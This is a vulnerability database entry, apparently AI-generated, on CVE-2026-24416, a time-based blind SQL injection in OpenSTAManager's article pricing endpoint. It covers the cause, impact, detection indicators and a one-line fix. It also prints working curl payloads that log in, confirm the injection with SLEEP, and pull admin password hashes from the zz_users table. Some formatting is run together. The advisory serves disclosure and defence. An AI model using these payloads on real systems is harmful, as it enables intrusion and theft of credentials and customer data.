
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-24416 is a Time-Based Blind SQL Injection vulnerability in the article pricing module of OpenSTAManager, an open-source management software for technical assistance and invoicing. The flaw affects all versions up to and including v2.9.8 and was disclosed on February 6, 2026, by researcher Łukasz Rybak. It carries a CVSS v3.1 score of 6.5 (Medium) and a CVSS v4.0 score of 8.7 (High) (GitHub Advisory, OSM Security Advisory).
The root cause (CWE-89) is an inconsistent application of parameterized queries in /modules/articoli/ajax/complete.php. In a UNION SQL query that fetches article pricing history, the idarticolo GET parameter is directly concatenated into the WHERE clause at line 70 (WHERE \idarticolo`='.$idarticolo.') without being wrapped in the application's prepare()function, while the adjacentidanagraficaparameter is correctly sanitized. This allows an authenticated attacker to inject arbitrary SQL via theidarticoloparameter in requests to/ajax_complete.php?op=getprezzi, using time-based Boolean inference (e.g., SLEEP()`) to extract data character by character. Exploitation requires only a valid low-privilege authenticated session with access to the article pricing functionality (OSM Security Advisory).
Successful exploitation allows an authenticated attacker to extract the complete database contents, including user credentials (usernames and bcrypt password hashes), customer data, and financial records such as invoices and orders. The vulnerability also enables unauthorized modification or deletion of database records, and could potentially be leveraged for further system compromise depending on database server configuration. The CVSS v4.0 assessment rates confidentiality, integrity, and availability impacts all as High for the vulnerable system (GitHub Advisory, OSM Security Advisory).
A detailed proof-of-concept (PoC), including both manual curl-based payloads and a full automated Python extraction script, was published alongside the advisory on February 6, 2026 (OSM Security Advisory). The vulnerability was confirmed and tested on live instances running v2.9.8 and v2.9.7. There is no current evidence of in-the-wild exploitation or threat actor attribution. The EPSS score is approximately 0.015% (3rd percentile), and the vulnerability is not listed in the CISA KEV catalog (GitHub Advisory).
/index.php?op=login and capture the session cookie.curl -c /tmp/cookies.txt -X POST 'http://TARGET/index.php?op=login' -d 'username=USER&password=PASS'idarticolo GET parameter to /ajax_complete.php?op=getprezzi and measure response time. A delay matching the SLEEP value confirms injection.curl -s -b /tmp/cookies.txt "http://TARGET/ajax_complete.php?op=getprezzi&idanagrafica=1&idarticolo=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(10)))a)"curl -s -b /tmp/cookies.txt "http://TARGET/ajax_complete.php?op=getprezzi&idanagrafica=1&idarticolo=1%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)"zz_users table to extract admin usernames and bcrypt password hashes character by character using the same time-based inference technique.curl -s -b /tmp/cookies.txt "http://TARGET/ajax_complete.php?op=getprezzi&idanagrafica=1&idarticolo=1%20AND%20(SELECT%20SUBSTRING(password,1,1)%20FROM%20zz_users%20WHERE%20id=1)=%27%24%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)"/ajax_complete.php?op=getprezzi with URL-encoded SQL keywords (SLEEP, SUBSTRING, SELECT, AND) in the idarticolo parameter; unusually high response times (e.g., 2–10+ seconds) for requests to this endpoint./ajax_complete.php with idarticolo values containing %20AND%20, SLEEP, SUBSTRING, or ORD patterns; sequences of near-identical requests differing only in the tested character or position (indicative of automated extraction).dt_righe_ddt or co_righe_documenti tables with injected SQL conditions; unexpected queries against zz_users table from the web application context.The fix requires modifying line 70 of /modules/articoli/ajax/complete.php to wrap the idarticolo parameter with the application's prepare() function, changing WHERE \idarticolo`='.$idarticolo.'toWHERE `idarticolo`='.prepare($idarticolo).'`. As of the advisory publication date, no patched release version has been issued by the vendor. Administrators should apply the one-line code fix manually, restrict access to the article pricing functionality to only necessary users, and conduct a broader audit of SQL queries across the codebase for similar inconsistencies (OSM Security Advisory, GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."